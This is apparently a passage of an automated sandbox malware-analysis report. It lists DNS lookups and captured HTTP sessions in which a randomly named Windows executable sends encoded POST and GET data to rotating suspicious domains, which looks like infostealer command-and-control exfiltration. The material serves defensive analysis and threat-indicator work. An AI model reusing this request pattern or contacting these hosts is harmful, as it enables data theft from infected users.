Jan 11, 2025 02:45:33.123291969 CET	192.168.2.7	1.1.1.1	0x35dc	Standard query (0)	www.mraber.dev	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:49.748538971 CET	192.168.2.7	1.1.1.1	0x9136	Standard query (0)	www.einpisalpace.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:03.561834097 CET	192.168.2.7	1.1.1.1	0xa074	Standard query (0)	www.multichaindapps.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:11.701951027 CET	192.168.2.7	1.1.1.1	0xcca8	Standard query (0)	www.fzmmkj.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:25.327491999 CET	192.168.2.7	1.1.1.1	0xc33b	Standard query (0)	www.l03678.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:39.062552929 CET	192.168.2.7	1.1.1.1	0x1ba5	Standard query (0)	www.aihuzhibo.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:53.031339884 CET	192.168.2.7	1.1.1.1	0x35aa	Standard query (0)	www.dkeqqi.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.483906031 CET	192.168.2.7	1.1.1.1	0x4e6b	Standard query (0)	www.uzshou.world	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:20.998795986 CET	192.168.2.7	1.1.1.1	0x2bd7	Standard query (0)	www.orthomumbai.online	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:34.453898907 CET	192.168.2.7	1.1.1.1	0x362a	Standard query (0)	www.44756.pizza	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 02:44:21.910444021 CET	1.1.1.1	192.168.2.7	0x6ee8	No error (0)	www.aoivej.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:44:38.614438057 CET	1.1.1.1	192.168.2.7	0x2886	No error (0)	www.givvjn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:44:52.907382011 CET	1.1.1.1	192.168.2.7	0xb176	No error (0)	www.gern.dev		185.151.30.223	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:06.498102903 CET	1.1.1.1	192.168.2.7	0xd77c	No error (0)	www.newbh.pro		176.57.65.76	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:19.841149092 CET	1.1.1.1	192.168.2.7	0x8fcb	No error (0)	www.thinkone.xyz		209.74.79.41	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:33.166722059 CET	1.1.1.1	192.168.2.7	0x35dc	No error (0)	www.mraber.dev	mraber.dev		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:45:33.166722059 CET	1.1.1.1	192.168.2.7	0x35dc	No error (0)	mraber.dev		46.38.243.234	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:49.762114048 CET	1.1.1.1	192.168.2.7	0x9136	No error (0)	www.einpisalpace.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:49.762114048 CET	1.1.1.1	192.168.2.7	0x9136	No error (0)	www.einpisalpace.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:03.623388052 CET	1.1.1.1	192.168.2.7	0xa074	No error (0)	www.multichaindapps.pro	multichaindapps.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:46:11.727375984 CET	1.1.1.1	192.168.2.7	0xcca8	No error (0)	www.fzmmkj.shop		18.163.74.139	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:25.808229923 CET	1.1.1.1	192.168.2.7	0xc33b	No error (0)	www.l03678.xyz		162.218.30.235	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:39.413677931 CET	1.1.1.1	192.168.2.7	0x1ba5	No error (0)	www.aihuzhibo.net		192.186.58.31	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:46:53.054910898 CET	1.1.1.1	192.168.2.7	0x35aa	No error (0)	www.dkeqqi.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:07.507956028 CET	1.1.1.1	192.168.2.7	0x4e6b	No error (0)	www.uzshou.world		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:21.294461012 CET	1.1.1.1	192.168.2.7	0x2bd7	No error (0)	www.orthomumbai.online		75.2.103.23	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:34.708961964 CET	1.1.1.1	192.168.2.7	0x362a	No error (0)	www.44756.pizza	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 02:47:34.708961964 CET	1.1.1.1	192.168.2.7	0x362a	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:47:34.708961964 CET	1.1.1.1	192.168.2.7	0x362a	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.aoivej.info

www.givvjn.info

www.gern.dev

www.newbh.pro

www.thinkone.xyz

www.mraber.dev

www.einpisalpace.shop

www.fzmmkj.shop

www.l03678.xyz

www.aihuzhibo.net

www.dkeqqi.info

www.uzshou.world

www.orthomumbai.online

www.44756.pizza

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49962	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:22.121277094 CET	437	OUT	GET /ou8k/?cNPH=sHhXhPPev91RFxpiABH++MCfuMPpFFZ8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmO0sI7dzm7yirMvYOFPgxKsvpHXbsFCpq0n5Sy3gZxoaEsqIw5Xzm0kuoI&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.aoivej.info Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:44:23.548336029 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 01:44:23 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49970	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:38.636176109 CET	685	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 64 6e 75 47 77 30 4a 2f 47 65 6a 35 59 69 66 48 6a 73 42 47 48 67 36 77 41 6f 31 52 6c 54 57 2f 37 49 54 64 43 6d 51 58 49 67 6e 5a 75 36 4e 73 41 3d 3d Data Ascii: cNPH=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNdnuGw0J/Gej5YifHjsBGHg6wAo1RlTW/7ITdCmQXIgnZu6NsA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49971	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:41.198565960 CET	705	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 31 72 4a 65 58 6c 4f 57 67 79 6c 50 69 52 4a 46 52 73 62 2b 35 71 52 2b 4c 69 38 66 72 71 33 56 53 54 5a 6f 55 76 75 46 79 4a 76 72 31 4a 37 59 55 31 73 4e 41 70 4b 71 6d 76 4a 73 6b 2b 4d 75 70 6f 61 5a 49 77 76 4b 59 57 4a 53 7a 68 6c 34 79 73 4e 4d 4b 44 77 52 36 69 64 53 49 65 50 32 7a 65 6f 4f 51 67 34 55 4e 76 43 64 69 49 53 44 79 64 70 61 51 58 4e 63 7a 56 43 6d 73 36 38 55 65 55 78 4f 6a 39 64 42 67 74 59 57 59 42 30 43 4d 44 47 44 4f 6a 39 36 4d 4c 51 67 53 78 49 2f 46 4e 55 38 62 4a 36 30 34 55 39 4b 2f 79 46 55 44 4e 31 65 49 76 4c 6e 2b 55 62 59 4d 3d Data Ascii: cNPH=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cdi1rJeXlOWgylPiRJFRsb+5qR+Li8frq3VSTZoUvuFyJvr1J7YU1sNApKqmvJsk+MupoaZIwvKYWJSzhl4ysNMKDwR6idSIeP2zeoOQg4UNvCdiISDydpaQXNczVCms68UeUxOj9dBgtYWYB0CMDGDOj96MLQgSxI/FNU8bJ604U9K/yFUDN1eIvLn+UbYM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49972	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:43.751092911 CET	1718	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 74 72 4a 4c 62 6c 50 31 59 79 6b 50 69 52 46 6c 52 74 62 2b 35 33 52 39 37 6d 38 66 6e 55 33 57 36 54 5a 4c 73 76 6f 30 79 4a 32 37 31 4a 6b 49 55 4f 7a 64 42 7a 4b 71 32 72 4a 73 30 2b 4d 75 70 6f 61 62 67 77 35 72 59 57 45 79 7a 69 74 59 7a 74 48 73 4b 6e 77 52 6a 56 64 53 4d 4f 54 58 54 65 78 75 41 67 30 42 5a 76 66 4e 69 4b 56 44 7a 61 70 61 63 49 4e 59 62 7a 43 6d 77 44 38 55 57 55 69 35 37 6a 59 44 55 78 42 6e 70 65 32 41 49 65 4a 67 69 57 79 4b 39 38 50 54 36 6b 4a 4e 70 53 4d 71 37 76 7a 44 6c 44 6c 5a 76 52 4e 31 76 4f 30 49 68 45 57 32 71 4b 50 49 4c 79 4c 36 71 44 57 79 54 51 49 66 57 32 62 4f 72 62 4b 50 73 70 50 4f 54 74 67 41 66 66 32 66 53 71 49 62 58 6c 52 62 4c 65 48 36 6c 4c 49 78 58 69 6b 69 75 4b 54 77 6a 4a 6e 39 6b 61 74 59 4c 7a 42 74 4b 69 7a 53 2b 50 75 43 72 44 51 75 31 34 4b 31 68 33 69 4a 71 51 38 77 47 74 66 4b 4a 36 36 6f 6c 6d 33 [TRUNCATED] Data Ascii: cNPH=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cditrJLblP1YykPiRFlRtb+53R97m8fnU3W6TZLsvo0yJ271JkIUOzdBzKq2rJs0+Mupoabgw5rYWEyzitYztHsKnwRjVdSMOTXTexuAg0BZvfNiKVDzapacINYbzCmwD8UWUi57jYDUxBnpe2AIeJgiWyK98PT6kJNpSMq7vzDlDlZvRN1vO0IhEW2qKPILyL6qDWyTQIfW2bOrbKPspPOTtgAff2fSqIbXlRbLeH6lLIxXikiuKTwjJn9katYLzBtKizS+PuCrDQu14K1h3iJqQ8wGtfKJ66olm3FTEdwTyqDCGrsL2uaY2IJXDB5ZnMFe4fxAZQRHjPQilor0eY5qp17AEfw+Gi6xEWG9eeNlJXmQDEt5ayAZj9sBVCxhz46wtUPmv1vv7rPYPlreq2aj/1z0oD4NqzU413wibMNzgLaW1wsFPWWjWgCZSUlfTO/lhkX3if/B1ib0ho+eMvEv51DXgU5afEy1aQ4D0uqW7pIpwagFSCLKuGPFzSVjTe2eghEOGlwal9B+u2DxIAJ06CQkVAYKqT5tbwE4cRrAzildTdU+5It1sLpuPk+Fr5JkS1eO2oUVrA9hWIQSm6kui2tHFmD6Auv/oOb8sdWweUowfVwFIHaflM+fh1AwmMl5y2CNznD6Y47SCoXDf30unpB3wqJfgVMPFVMgXuI+dLh2IMs3Fp8LDiaih9t/dAd1iXZn+h4unVqydrt0vIDKomuFeaXAJJXtQYFPKbw6Kh/boaR5HCD7h3uILKvAZYKo0kaAdkZx+aIVn3gANSgDdJR/XLsf2THki7pi1zOmNpykddYAPSX45DJTOHGP8Vs9/3RRwnf3XXGQpQvPw3/3Hn9XAMd8xaV3f7jvQ9OGhOP5Og9EA0z5VQEZQDa739qYVQfREsMBAEum0FdKsKvNdXPp8atj87OKZZJmByRsgjmIKQMqqbGhuEOTCCi8TFCAkc5G [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49973	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:46.293313026 CET	437	OUT	GET /wl3x/?cNPH=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.givvjn.info Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:44:47.852638006 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 01:44:47 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49974	185.151.30.223	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:52.936006069 CET	676	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 73 66 61 67 4b 57 32 62 78 63 57 45 44 79 72 45 51 5a 36 4d 30 75 4a 70 77 34 67 7a 73 70 49 74 56 54 30 30 33 55 53 47 49 64 45 6b 43 41 75 47 6b 69 4a 68 65 54 35 2f 4b 6c 45 66 64 53 70 44 7a 4c 5a 32 36 4c 6a 66 78 74 38 35 78 56 6e 51 49 30 57 59 6b 4c 6c 4c 77 34 50 69 51 43 44 5a 46 78 6f 6c 58 75 44 71 57 65 63 39 4d 70 32 70 58 47 4e 69 4a 69 2f 67 61 55 6f 6c 4c 49 39 43 49 33 30 38 36 57 41 4e 77 36 64 5a 45 39 52 73 5a 4d 73 41 33 37 77 46 6a 5a 53 6b 4a 31 4f 77 79 74 2b 6e 55 63 30 4c 6d 7a 6a 7a 4d 55 63 74 41 34 6d 64 78 32 32 47 53 77 6b 51 4b 66 6d 59 79 66 79 45 41 3d 3d Data Ascii: cNPH=mogvKCZbuOVZjsfagKW2bxcWEDyrEQZ6M0uJpw4gzspItVT003USGIdEkCAuGkiJheT5/KlEfdSpDzLZ26Ljfxt85xVnQI0WYkLlLw4PiQCDZFxolXuDqWec9Mp2pXGNiJi/gaUolLI9CI3086WANw6dZE9RsZMsA37wFjZSkJ1Owyt+nUc0LmzjzMUctA4mdx22GSwkQKfmYyfyEA==
Jan 11, 2025 02:44:53.688746929 CET	212	IN	HTTP/1.1 403 content-length: 93 cache-control: no-cache content-type: text/html x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49975	185.151.30.223	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:55.492682934 CET	696	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 39 49 73 77 33 30 31 32 55 53 48 49 64 45 38 53 41 68 5a 30 69 41 68 65 66 62 2f 50 4e 45 66 64 47 70 44 79 37 5a 32 4e 6e 67 65 68 74 2b 6e 52 56 6c 55 49 30 57 59 6b 4c 6c 4c 78 64 59 69 51 4b 44 5a 31 42 6f 33 6c 47 41 30 47 65 66 38 4d 70 32 2b 6e 48 45 69 4a 69 52 67 59 67 47 6c 4a 77 39 43 4a 48 30 38 76 71 44 59 41 36 62 45 55 38 66 72 71 35 30 5a 58 6e 63 49 77 68 4d 70 5a 64 77 34 6b 73 63 39 32 51 59 56 33 4c 59 33 4f 77 71 36 6d 6c 54 66 77 79 75 4c 77 45 46 50 39 36 4d 56 67 2b 32 53 33 53 48 4c 45 2b 4a 75 67 47 68 6c 4b 35 6f 73 68 54 39 78 75 4d 3d Data Ascii: cNPH=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90e9Isw3012USHIdE8SAhZ0iAhefb/PNEfdGpDy7Z2Nngeht+nRVlUI0WYkLlLxdYiQKDZ1Bo3lGA0Gef8Mp2+nHEiJiRgYgGlJw9CJH08vqDYA6bEU8frq50ZXncIwhMpZdw4ksc92QYV3LY3Owq6mlTfwyuLwEFP96MVg+2S3SHLE+JugGhlK5oshT9xuM=
Jan 11, 2025 02:44:56.258914948 CET	212	IN	HTTP/1.1 403 content-length: 93 cache-control: no-cache content-type: text/html x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49976	185.151.30.223	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:44:58.037822962 CET	1709	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 46 49 73 47 72 30 30 52 34 53 45 49 64 45 69 43 41 31 5a 30 6a 43 68 65 58 66 2f 50 42 2b 66 65 2b 70 5a 51 44 5a 30 34 54 67 48 78 74 2b 76 78 56 6d 51 49 31 55 59 6b 62 68 4c 77 74 59 69 51 4b 44 5a 32 5a 6f 6e 6e 75 41 7a 32 65 63 39 4d 70 71 70 58 48 6f 69 4a 71 6e 67 59 6b 34 6b 34 51 39 43 70 58 30 36 64 43 44 45 51 36 5a 48 55 39 43 72 71 6c 56 5a 58 72 51 49 78 46 79 70 61 39 77 34 68 41 4b 36 46 34 59 42 68 58 43 31 49 52 47 32 57 6c 47 64 43 2b 52 49 54 73 6a 47 39 69 57 57 52 6e 2b 63 41 37 65 54 47 32 44 76 53 6d 58 6f 64 67 5a 78 68 7a 47 31 72 52 59 66 6b 79 34 6a 6b 47 34 46 67 4f 56 4a 6f 74 4b 74 33 31 6c 45 39 37 6c 4a 44 6c 79 2f 50 79 49 7a 37 52 55 69 59 2b 73 4e 56 72 7a 65 61 79 76 66 4b 64 56 6c 45 43 6a 77 52 41 41 4e 62 56 63 54 6e 67 30 71 70 4b 35 45 66 7a 57 56 71 57 2f 51 68 4d 76 65 59 52 48 66 62 71 34 2b 75 42 45 4e 64 65 58 51 [TRUNCATED] Data Ascii: cNPH=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90eFIsGr00R4SEIdEiCA1Z0jCheXf/PB+fe+pZQDZ04TgHxt+vxVmQI1UYkbhLwtYiQKDZ2ZonnuAz2ec9MpqpXHoiJqngYk4k4Q9CpX06dCDEQ6ZHU9CrqlVZXrQIxFypa9w4hAK6F4YBhXC1IRG2WlGdC+RITsjG9iWWRn+cA7eTG2DvSmXodgZxhzG1rRYfky4jkG4FgOVJotKt31lE97lJDly/PyIz7RUiY+sNVrzeayvfKdVlECjwRAANbVcTng0qpK5EfzWVqW/QhMveYRHfbq4+uBENdeXQBdO3iylIcMbA6yii4hDzSpDs7NpCGrgZl4jFsZcdxu7x/QCfgaRupMO9c03zR5NWQC1kCg3Ywo5Yv0nh9joCGvbjMuSDpkrNLIaPE8Rm3EHLfG6AGRoa20RJggrvP+zzqkqnyWc+b2u2rsoHG5Dw4SlL6+DkOPbJoGl5ODurYg8NLU5PxawzXc24QAAwAb1pFJkDufkKgMSuYiOxVl5kN4Z1kaEB7CoaGUsv5K3TmK0vimjIv5dXjPu+2AI7YyqEDM7t+LYqCNAwvHqa+aleDD45LRy7k8Lci6MQfoleH2Xw2ONged1wSwG8lF8cPKXvRENGwq4CeUUx/YibDN4FX+lYgKCOLGxAjNFwXpvPzSYhxyR5ljVa1peEbj88DEz8djCLixzQJqgu3oXxk+rEfvBaI6l5O/FcQ2jQ5oxbcfpO4jwQm6RBq0f2LOLU+it1xsIowZu721MFJULyxCFjrUTdS7mvlThsuQ+WnXozaI6X9PUrC6JkTvPwgP5RePEX3FP+YJIOxg7zXsnjYwPBDWqqoNG63nQMu/ADlL8DyDpul7Z8fGAW57uob4dHFQh81Sv3TZQvQnaOWbeVwBWDgICLLdKqf4dvIz2JlMlZoPPTA+TFvVBV0+T0emAitJmvomNrP+0CBj0zRlHYNZr93vw7cBlUQp4eOw [TRUNCATED]
Jan 11, 2025 02:44:58.790909052 CET	212	IN	HTTP/1.1 403 content-length: 93 cache-control: no-cache content-type: text/html x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49977	185.151.30.223	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
